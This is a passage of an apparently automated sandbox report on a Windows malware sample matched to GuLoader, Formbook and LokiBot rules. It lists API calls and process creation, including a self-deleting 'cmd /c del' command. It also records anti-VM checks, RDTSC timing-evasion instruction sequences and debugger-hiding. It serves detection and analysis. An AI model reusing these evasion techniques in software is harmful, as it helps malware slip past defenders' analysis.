    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A10 NtQuerySection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A00 NtProtectVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A20 NtResumeThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A80 NtOpenDirectoryObject,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119D50 NtCreateFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119F30 NtAllocateVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E00 NtReadFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E80 NtClose,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119D4B NtCreateFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119DA4 NtCreateFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119DFE NtReadFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119F2B NtAllocateVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E7A NtClose,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403858
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00401218
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403C2E
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403A59
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403AEE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403A87
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403B49
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00403B13
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E166E30
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20D616
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E212EF7
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E211FF1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21DFCE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15841F
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20D466
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E212D07
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E140D20
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E211D55
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E172581
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15D5E0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2125DD
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FFA2B
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2122AE
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E212B28
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AB40
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17EBB0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20DBD2
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2003DA
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E21E824
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201002
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16A830
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E15B090
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2120A8
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1720A0
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E2128EC
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14F900
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E164120
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1699BF
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A2D07
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050D0D20
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A1D55
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05102581
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A25DD
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050ED5E0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050E841F
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519D466
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051ADFCE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A1FF1
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519D616
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F6E30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A2EF7
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050DF900
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050F4120
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05191002
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051AE824
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_050EB090
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051020A0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A20A8
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A28EC
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A2B28
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0510EBB0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051903DA
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0519DBD2
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051A22AE
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01102D90
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111E5ED
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111DF6E
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CF93
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111D781
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01102FB0
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01109E30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01109E2C
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111DE55
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 050DB150 appears 45 times
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: String function: 1E14B150 appears 66 times
    Source: 2eD17GZuWs.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: 2eD17GZuWs.exe, 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000000.00000002.691998474.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.933965294.000000001E3CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.928375557.00000000008D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000000.690796127.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exeBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
    Source: 2eD17GZuWs.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 2eD17GZuWs.exeVirustotal: Detection: 25%
    Source: unknownProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: Binary string: msiexec.pdb source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp
    Source: Binary string: msiexec.pdbGCTL source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: 2eD17GZuWs.exe, 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, msiexec.exe, 0000000D.00000002.933247040.00000000050B0000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: 2eD17GZuWs.exe, msiexec.exe
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000002.944274718.0000000005A00000.00000002.00000001.sdmp

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Yara detected VB6 Downloader GenericShow sources
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 4700, type: MEMORY
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040984F push ecx; retf
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00409D50 push edi; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00409D55 push edi; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406910 pushad ; iretd
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004069F5 push EF15CAC2h; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040759B push FFFFFFC6h; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406653 pushad ; iretd
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00406A98 pushfd ; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_004082AF push FFFFFFDAh; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_0040A3DA push ecx; retf
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00407FAA push esp; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_00407FB3 push ecx; retf
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E19D0D1 push ecx; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0512D0D1 push ecx; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_011169BB push esi; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0110AB07 push ds; retf
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CF5C push eax; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01114E05 push ss; retf
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEA5 push eax; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEF2 push eax; ret
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0111CEFB push eax; ret
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: 2eD17GZuWs.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F13 second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA87CD1247Ch 0x0000001c call 00007FA87CD1244Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4F7E second address: 00000000021D4F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA87CCF90B8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA87CCF908Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA87CCF90FCh 0x00000043 call 00007FA87CCF90CAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000021D4FA0 second address: 00000000021D4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CD1284Dh 0x0000001f popad 0x00000020 call 00007FA87CD12521h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 0000000000564FA0 second address: 0000000000564FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA87CCF94CDh 0x0000001f popad 0x00000020 call 00007FA87CCF91A1h 0x00000025 lfence 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000011098E4 second address: 00000000011098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000001109B4E second address: 0000000001109B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B rdtsc
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: explorer.exe, 0000000A.00000000.896175080.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000000.894315754.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000000.896175080.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: 2eD17GZuWs.exe, 00000001.00000003.927010291.0000000000948000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 0000000A.00000002.940809736.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
    Source: 2eD17GZuWs.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
    Source: explorer.exe, 0000000A.00000000.891875190.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess information queried: ProcessInformation

    Anti Debugging:

    barindex
    Contains functionality to hide a thread from the debuggerShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D06B1 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess queried: DebugPort
    Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B rdtsc
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D3746 LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D54F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1E09 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1721 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D1C16 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D4802 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D4CBB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5531 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D29C8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E17A61C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14C600 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E178E00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1FFE3F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E201608 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E14E620 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E157E41 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E20AE44 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
